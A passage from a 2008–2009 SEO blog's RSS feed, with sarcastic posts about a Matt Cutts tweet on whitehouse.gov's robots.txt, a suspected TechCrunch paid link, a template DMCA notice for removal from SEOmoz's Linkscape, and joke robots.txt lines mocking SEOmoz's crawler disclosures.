<p>Now, while the <a href="http://www.google.com/support/webmasters/bin/answer.py?hl=en&#038;answer=35769" target="_blank">Google Webmaster Guidelines</a> still specifically instruct webmasters to <span id="more-231"></span>block these pages, Matt himself appears to have changed his mind on the issue. Today on Twitter, <a href="http://twitter.com/mattcutts/status/1136707361" target="_blank">Matt said this</a>:</p>
<p><img src="/images/matt-likes-more-crawling.png" alt="Give me your tired, your poor, your masses of auto-generated pages! - Matt Cutts" onmouseup="hl2l(event);"></p>
<p>The <a href="http://www.kottke.org/09/01/the-countrys-new-robotstxt-file" target="_blank">link that Matt provided</a> was to a story discussing the differences between the robots.txt file for the whitehouse.gov website under the Bush regime (<a href="/images/whitehouse-bush-robots-txt.txt" target="_blank">cached copy</a>), versus the brand spanking new one that went up as soon as Obama took office. Matt apparently likes it because it means that as far as Google goes, there is &#8220;much more crawling allowed&#8221; with the <a href="http://www.whitehouse.gov/robots.txt" target="_blank">new file</a>:</p>
<p><img src="/images/whitehouse-obama-robots-txt.png" alt="Much more crawling allowed - Matt Cutts" onmouseup="hl2l(event);"></p>
<p>He&#8217;s right, of course. The new version only restricts one directory (for now, anyways), the /includes/ one, whereas the old version contained 2,305 path restrictions that pertained to Google (and every other bot, for that matter). Let&#8217;s take a look, however, at exactly what the old version was blocking from being indexed:</p>
<p><img src="/images/whitehouse-bush-robots-txt.png" alt="Much less crawling allowed" onmouseup="hl2l(event);"></p>
<p>The first line is for /cgi-bin, which it is quite normal to block. The next 11 lines blocked are all search type pages. Now, even though the Google Webmaster Guidelines very clearly state that those pages should be blocked, since Matt is saying that &#8220;more crawling allowed == Matt likes&#8221; I would strongly suggest that people <em>not</em> block them in their own robots.txt*. For real. Cause as we all know, Matt > Google Webmaster Guidelines. Seriously.</p>
<p>Some of you may be wondering about the other 2,293 restrictions in the old file. If you look at the restrictions starting at the 13th path listed, and on through the rest of them that Google is supposed to obey, every path ends with /text. Those were the printer friendly versions of other pages, and indexing them would result in duplicate content getting indexed in Google. Last year in February, Matt had this to say about <a href="http://www.mattcutts.com/blog/duplicate-content-question/" target="_blank">blocking duplicate content</a>:</p>
<blockquote><p>I often get questions from whitehat sites who are worried that they might receive duplicate content penalties because they have the same article in different formats ( e.g. a paginated version and a printer-ready version). While <strong>it&#8217;s helpful to try to pick one of those articles and exclude the other version from indexing</strong>, typically.. &#8211; <em>Matt Cutts</em></p></blockquote>
<p>That, however, was last year. As Matt clearly indicates in his tweet today, regardless of what the content actually is, how it was generated, or how many copies of it exist, he would <em>much</em> prefer less restrictive robots.txt files in the future.</p>
<p>Thanks for clarifying, Matt. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><strong>UPDATE:</strong> Ok, I just got alerted to the fact that these new and improved Whitehouse.gov &#8220;allowed pages&#8221; are already <a href="http://www.google.com/search?num=100&#038;hl=en&#038;safe=off&#038;q=site%3Awhitehouse.gov%2Fsearch%2F%3Fkeywords%3D&#038;btnG=Search" target="_blank">making it into the serps</a>:</p>
<p><img src="/images/whitehouse-search-in-search.png" alt="Much more crawling results in Google" onmouseup="hl2l(event);"></p>
<p>Thank you <a href="http://twitter.com/johnweb" target="_blank">John Honeck</a> for the heads up.</p>
<div><em><strong>*Disclaimer:</strong> Kidding, btw, for those who can&#8217;t detect sarcasm. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  </em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Matt Cutts, If This Paid Link Were A Snake It Would Have Bitten You In The Ass</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 12:53:48 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=179</guid>
		<description><![CDATA[Wednesday TechCrunch posted an article about a new ad product launched by MediaWhiz. The name of the product is InLinks, and it involves people being able to purchase anchor rich text links embedded into content in a way that is supposed to give it a &#8220;natural&#8221; feel. Michael Arrington called the product &#8220;insidious&#8221;. His whole [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/pagerank-for-sale.png" border="0" alt="PageRank for sale." style="float: right;"  onmouseup="hl2l(event);"> Wednesday  <a href="http://www.techcrunch.com/2008/11/19/insidious-new-seo-ad-product-will-be-hard-for-google-to-detect/" target="_blank">TechCrunch posted an article</a> about a new ad product launched by MediaWhiz. The name of the product is InLinks, and it involves people being able to purchase anchor rich text links embedded into content in a way that is supposed to give it a &#8220;natural&#8221; feel. Michael Arrington called the product &#8220;insidious&#8221;. His whole take on it was that these new paid links would &#8220;be hard for Google to detect&#8221;. Quite a <a href="http://www.shoemoney.com/2008/11/19/does-google-really-want-to-go-down-this-ftc-route/" target="_blank">bit of</a> <a href="http://www.seobook.com/in-links-launches" target="_blank">discussion</a> <a href="http://www.blogstorm.co.uk/how-google-can-detect-inlinks/1554/" target="_blank">followed</a>, sparked in large part by the fact that Matt Cutts chimed in on the matter. What no one seemed to notice, however,<span id="more-179"></span> is that Matt, who most would naturally think of as an expert in detecting paid links, apparently missed one when it was staring him right in the face&#8230; the link that MediaWhiz bought from TechCrunch.</p>
<p>Check the source on the post by Arrington, and sure enough, you will find a nice, clean, non-nofollowed link back to MediaWhiz. I have to give them credit too&#8230; it was slick the way they covered their tracks on this one. First, they either purchased some links on a couple of lesser known blogs, namely <a href="http://www.deepjiveinterests.com/2008/11/19/text-link-ads-debuts-inlinkscom-hopes-to-fly-under-googles-radar/" target="_blank">Deep Jive Interests</a> and <a href="http://www.labnol.org/internet/inlinks-new-text-links-ads-tough-to-detect/5476/" target="_blank">Digital Inspiration</a>, or they simply waited for someone to just blog about their new product without being asked. This made it at least <em>somewhat</em> plausible that Michael Arrington just happened to stumble across the release of their new product all on his own. Of course, it also helps that the link sale wasn&#8217;t discussed openly on a forum, and that Arrington doesn&#8217;t publicly list the cost of a content link on TechCrunch anywhere. No, a link sale like this would have been privately negotiated, behind closed doors and away from prying eyes (and out of the sight of potential Google snitches).</p>
<p>How much would a link like this cost? Probably not cheap. It&#8217;s not just the raw link juice that has to be factored into the price, either&#8230; it&#8217;s also the fact that blogs like TechCrunch are so completely above suspicion. It might not have been an all cash transaction, either&#8230; there could have been an expensive meal involved in the negotiations, or perhaps even some barter tossed in. </p>
<p>Do I know for a fact that MediaWhiz purchased that link from TechCrunch? Nope. Then again, neither does Google. </p>
<p>Now, I am sure that many people will be buying floods of new content links from this new service, and of course Google, seeing as they have historical link graphs to compare to, will probably easily spot link growth spikes of a certain level. However, there is no way that they will be able to detect content links like this new service is offering that are obtained stealthily. That doesn&#8217;t mean they won&#8217;t try. Their attempts to do so will no doubt cause much collateral damage to the rankings (and therefore traffic, and revenue) of many legitimate, quality sites out there. Google, however, doesn&#8217;t really care about that. You see, it&#8217;s not always about quality for Google. Often times, it&#8217;s about appearances.</p>
<p>Somewhere along the line, someone stated that they had PageRank for sale, that for a certain price you could buy higher rankings. One of the higher ups at Google caught wind of this, and thought, &#8220;Oh, no, we can&#8217;t have that&#8230; Google is supposed to be ungameable! This will make us <em>look</em> bad!&#8221; Right then and there, the war against paid links was launched&#8230; and it&#8217;s really not a battle that Google can win. Google cannot stop value passing links from being a commodity. What Google <em>can</em> do is drive up the price of links like this, the ones that truly will pass being manually reviewed. Sure, Google can do a ton of damage to the rankings of a lot of sites, and they might even hit an actual paid link here and there&#8230; but that won&#8217;t help with relevancy. If this really was a battle that was concerned with quality instead of image, then they wouldn&#8217;t care about links that were purchased to <em>quality</em> sites. The whole argument about editorial discretion would then actually mean something.</p>
<p>You know, here&#8217;s a thought. If Google quit worrying about whether or not a link was paid, and simply worked more on penalizing for linking out to <em>crappy</em> sites, then eventually people would stop linking out <em>just</em> for money, out of self-preservation. The issue of whether or not paid links lowered the quality of the serps would simply go away. It&#8217;s a much more elegant solution, don&#8217;t you think?</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How To Remove Your Website From Linkscape *Without* An SEOmoz Meta Tag</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/#comments</comments>
		<pubDate>Tue, 21 Oct 2008 07:55:50 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>
		<category><![CDATA[web design]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=156</guid>
		<description><![CDATA[Over the past couple of weeks, one of the biggest concerns about SEOmoz&#8217;s new Linkscape tool (which I recently blogged about in reference to the bots that Rand refuses to identify, and then again due to suspicious additions of a phantom 7 billion pages to one of his index sources) has been the complete lack [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/gavel.jpg" border="0" alt="You do have rights to your content." style="float: right;"  onmouseup="hl2l(event);"> Over the past couple of weeks, one of the biggest concerns about SEOmoz&#8217;s new Linkscape tool (which I recently blogged about in reference to the <a href="/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/" target="_blank">bots that Rand refuses to identify</a>, and then again due to <a href="/2008/10/20/how-to-add-7-billion-pages-to-your-index-overnight" target="_blank">suspicious additions of a phantom 7 billion pages</a> to one of his index sources) has been the complete lack of a method available for someone to remove their data from the tool. Assuming that all of the hints Rand has been so &#8220;subtly&#8221; dropping are accurate, and the one bot that they do actually have control over is in fact <a href="http://www.dotnetdotcom.org/" target="_blank">DotBot</a>, then from the beginning the data was collected under false pretenses. The DotBot website clearly states<span id="more-156"></span> the following as it&#8217;s purpose:</p>
<blockquote><p>Our purpose is rather simple. We want to make the internet as open as possible. Currently only a select few corporations have a complete and useful index of the web. Our goal is to change that fact by crawling the web and releasing as much information about its structure and content as possible. We plan on doing this in a manner that will cover our costs (selling our index) and releasing it for free for the benefit of all webmasters.</p></blockquote>
<p>If, again, DotBot is owned by SEOmoz, then actual goal of collecting those webpages was the development of a commercial tool. With that in mind, Rand&#8217;s refusal to remove pages from the index that the owners do not want in there takes on a whole new level of unreasonableness. When <a href="http://sphinn.com/story/80142#c56146" target="_blank">pressed about it</a>, this is the most Rand is willing to compromise as far as removing sites from the index:</p>
<blockquote><p>3)SEOmoz will ONLY remove your site from DISPLAYING your data through Linkscape if you add a customized SEOmoz meta tag to each and every page on your site, and even then, only after a 30-60 day time period.</p>
<p>Yes, although we are looking at ways to block an entire site from being shown in the future through a registration system. And yes, we can&#8217;t block anything until we&#8217;ve re-crawled and re-indexed that page, which can take 30-60 days depending on the speed with which we crawl/re-crawl a given URL.</p>
<p>4)SEOmoz is &#8220;unwilling to provide a clear concise way to keep data out of Linkscape.&#8221;</p>
<p>That&#8217;s what you said, and I merely copied it to point out that it had an exception. I know it&#8217;s a fun soundbyte, but without the important caveat in the sentence it was in, it&#8217;s really unfair to keep using this phrase. That caveat is that we are willing to provide one clear, concise way to keep data out of Linkscape &#8211; the seomoz noindex meta tag.</p></blockquote>
<p>So, the only way Rand will <em>voluntarily</em> remove your site from his index is if you agree to basically brand your website with a meta tag using his company name, and then wait 30-60 days. Unfortunately for him, that&#8217;s really not his call.</p>
<p>You own your website and the data it contains (assuming you did not scrape it from somewhere else, of course), and that ownership is protected under US copyright law. Anyone whose rights are violated under that law have specific remedies available to them under the <a href="http://en.wikipedia.org/wiki/Digital_Millennium_Copyright_Act" target="_blank">Digital Millennium Copyright Act</a>.</p>
<p><strong>Now, I cannot stress this strongly enough&#8230;</strong> these remedies are <em>not</em> intended to harass a website owner. They should be used neither frivolously nor fraudulently, and <em>there are penalties for filing false information</em>. You should under no circumstances perform this process for any urls or domains that you do not explicitly own, and if a counter-notification does get filed then you should in fact follow through with a lawsuit.</p>
<p>For all <em>valid</em> claims, I am outlining an easy to follow process for requesting that your information be removed from his index.</p>
<p>First, verify that your content is indeed in their tool. If it is, then the next step is to contact SEOmoz directly. Give them a chance to rectify the situation within a timely manner. Send a polite request that your entire domain be completely removed from the index powering their Linkscape tool, and for a way to confirm that it has indeed been done once they have. The support email for SEOmoz is listed on the site as <a href="mailto:sitesupport@seomoz.org">sitesupport@seomoz.org</a>, or you can fax them the request at (206) 338-3797. In this request you should list who you are, the address of your domain, and your contact information. Despite Rand&#8217;s insistence that they cannot do this, it might turn out that they do in fact have the ability after all. Do not skip the step of contacting them first. For tracking purposes, you might want to CC their ISP with this initial request, to document that you did indeed attempt to resolve the issue with them first, although this is not required. If you do decide to do that, SEOmoz&#8217;s ISP is <a href="http://www.hopone.net/" target="_blank">HopOne Internet Corporation</a>. The appropriate email to use for these matters, according to <a href="http://www.hopone.net/aup.php" target="_blank">HopOne&#8217;s AUP</a>, is <a href="mailto:abuse@hopone.net">abuse@hopone.net</a>, and their fax is (604) 608-2953.</p>
<p>If after a reasonable amount of time, say, 24 hours, they still have not removed your sites information, then you can consider sending a formal DMCA letter to their ISP, HopOne. The requirements for such a letter are very specific, and are laid out in <a href="http://www4.law.cornell.edu/uscode/17/512.html#c_3" target="_blank">17 U.S.C. § 512(c)(3)</a>, &#8221; Elements of notification&#8221;. A sample DMCA notice for this purpose might look something like this:</p>
<blockquote><p>To: abuse@hopone.net<br />
Subject: Notice of Copyright Infringement<br />
The copyrighted work at issue is the the entire set of links appearing on my domain at {<strong>www.mydomain.com</strong>}, each comprised of their respective URLs, anchor texts, and attributes, including both those constituting my websites navigation, as well as those linking my website to other websites on the Internet. While I acknowledge than an individual url in and of itself may not be copyrightable, I maintain that the set of links residing on my website taken as a whole or in sections do in fact comprise a structure that is unique and my own property.</p>
<p>The freely accessible URL where my copyrighted material is located is accessed through the gateway page located at http://www.seomoz.org/linkscape . Since the interface that is displaying my content is only visible via an http POST request, it is necessary to enter my domain {<strong>www.mydomain.com</strong>} into the text box presented, and then press the button labeled &#8220;GO&#8221;, in order to view the infringing material. Note that while this does demonstrate the existence of the infringing material being used on the server, it is only the one open to the general public without paying a fee, although this request is for the removal of the information from the index completely, including from areas accessible only to paying members of the website.</p>
<p>The contact information for the company of the infringing website, as indicated by their Contact Us page, is as follows:<br />
Office: (206) 632-3171<br />
Fax: (206) 338-3797<br />
sitesupport@seomoz.org<br />
SEOmoz.org<br />
1221 E. Pike St., Suite 200<br />
Seattle, WA 98122</p>
<p>I can be reached at {<strong>your@email.com</strong>}, or via telephone at {<strong>your telephone number</strong>}. My mailing address is {<strong>your full mailing address, including street and number, any apartment number, city, state, and zip code</strong>}.</p>
<p>I have a good faith belief that use of the copyrighted materials described above as allegedly infringing is not authorized by the copyright owner, its agent, or the law.</p>
<p>I swear, under penalty of perjury, that the information in the notification is accurate and that I am the copyright owner or am authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.</p>
<p>At your earliest convenience, please respond to this letter at my email address listed above, and let me know what actions have been taken to resolve this matter. Thank you.</p>
<p>My electronic signature is below:<br />
{<strong>Put Your Name Here</strong>}</p></blockquote>
<p>Bottom line is, it would be nice if Rand would simply step up to the plate and actually <em>be</em> the nice guy he wants everyone to believe that he is. Until such time as that actually happens, however, as sad as it may be, this may be our only recourse to keep him from using our information without consent.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>How To Block The Bots SEOmoz *Isn&#8217;t* Telling You About</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/#comments</comments>
		<pubDate>Fri, 17 Oct 2008 18:05:54 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=132</guid>
		<description><![CDATA[Ok, so, looks like Rand and gang finally decided to reveal their top-secret recipe about how they gathered all that information on everybody&#8217;s websites without anyone noticing what they were doing. There was quite a bit of hoopla over the fact that when they announced their new index of 30 billion web pages (and the [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/oath_witness.png" border="0" alt="I swear to tell the... wait, what did you say..?" style="float: right;"  onmouseup="hl2l(event);"> Ok, so, looks like Rand and gang finally decided to reveal their top-secret recipe about how they gathered all that information on everybody&#8217;s websites without anyone noticing what they were doing. There was <a href="http://ekstreme.com/thingsofsorts/fun-web/the-seomoz-linkscape-ghost" target="_blank">quite a bit of hoopla</a> over the fact that <a href="http://www.seomoz.org/blog/announcing-seomozs-index-of-the-web-and-the-launch-of-our-linkscape-tool" target="_blank">when they announced their new index of 30 billion web pages</a> (and the new tool powered by that index), due to the fact that they never gave webmasters the chance to block them from gathering this data. In fact, they never even<span id="more-132"></span> announced their presence at all.</p>
<p>While this is a huge breach of netiquette as it pertains to crawlers, at least today <a href="http://sphinn.com/story/77000#c55704" target="_blank">Rand finally announced</a> that they are now disclosing their sources for data. In fact, this was how he worded it to the community:</p>
<blockquote><p>we are now disclosing our sources for data &#8211; <em>Rand Fiskin, SEOmoz CEO and really, really open guy</em></p></blockquote>
<p>Better late than never, right?</p>
<p>The thing is, as I was looking over the list of bots that you would need to block in order to prevent mozzers from gathering your data, I noticed this subtle, easy to miss pattern in what they were listing. You have to look really, really close to see it, and the untrained eye might never see it at all, but luckily, eventually, I did see it for myself:</p>
<p><img src="/images/moz-crawlers2.png" alt="other data sources and additional crawls...?" onmouseup="hl2l(event);"></p>
<p>That&#8217;s right folks, if you <em>do</em> decide to keep moz out by blocking all of the big guys (Google, Yahoo, MSN, Ask, Amazon, and Alexa), the lesser known guys (Dotnetdotcom, Grub, Page-Store, and Exalead), and that one <em>fictional</em> guy they threw in there (Gagablast), you still won&#8217;t have them blocked. Fear not though&#8230; after much work, I finally figured out that Rand was indeed true to his word, and that they did in fact release enough information to block the bots. All you have to do is add the following lines to your robots.txt, and you&#8217;ll be golden*:</p>
<pre>
<code>User-Agent: *and other data sources
Disallow: /
User-Agent: Additional crawls*
Disallow: /</code>
</pre>
<p>See? I got ya covered! <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Seriously though, despite the fact that Rand and Co. are still less than forthcoming about all of the bots that are used (I&#8217;m guessing he doesn&#8217;t actually know, to be honest), something much more revealing is highlighted in this information, namely, <em>they lied about having their own crawler</em>.</p>
<p>Let&#8217;s take a quick review of some statements Rand made in the initial announcement about the tool:</p>
<ul>
<li>Our crawl biases towards having pages and data&#8230;</li>
<li>As others who&#8217;ve invested energy into crawling the web&#8230;</li>
<li>our crawl biases towards this &#8220;center&#8221;&#8230;</li>
<li>Our process for crawling the web&#8230;</li>
<li>Moving forward, we&#8217;ll&#8230; invest in better and faster crawling&#8230;</li>
<li>In comparing our crawls against the engines&#8230;</li>
<li>we&#8217;ll be releasing more information about our crawl&#8230;</li>
</ul>
<p>You also have statements made by moz employee Nick Gerner like this:</p>
<ul>
<li>we&#8217;re crawling everything we can&#8230;</li>
</ul>
<p>You even have him claiming bullshit like this:</p>
<blockquote><p>We do prioritize the crawl according to pages we think are important. For now, and probably for the foreseeable future we&#8217;re going to rely on link endorsement to make that decision. Make good content, get good links. Keep it publicly available. We&#8217;ll get there soon enough &#8211; <em>Nick Gerner, moz employee</em></p></blockquote>
<p>That&#8217;s right, not only did they claim that they were crawling the web, they wanted us to believe  that they prioritized how they crawled based on an <em>importance</em> algorithm! <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>I have to admit, Rand, it&#8217;s pretty bold to basically admit this late in the game that you guys lied through your teeth and grossly misrepresented the facts, just so you could appear to have accomplished a much bigger task than you actually did, all in the name of getting more money from webmasters. That&#8217;s a much bigger admission than saying you cloaked your bot, if you ask me. Gratz on coming clean.</p>
<div><em><strong>*Disclaimer:</strong> The code I listed is sarcasm, btw. Those robots.txt lines won&#8217;t actually block anything, just in case you didn&#8217;t know.</em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/feed/</wfw:commentRss>
		<slash:comments>78</slash:comments>
		</item>
	</channel>
</rss>

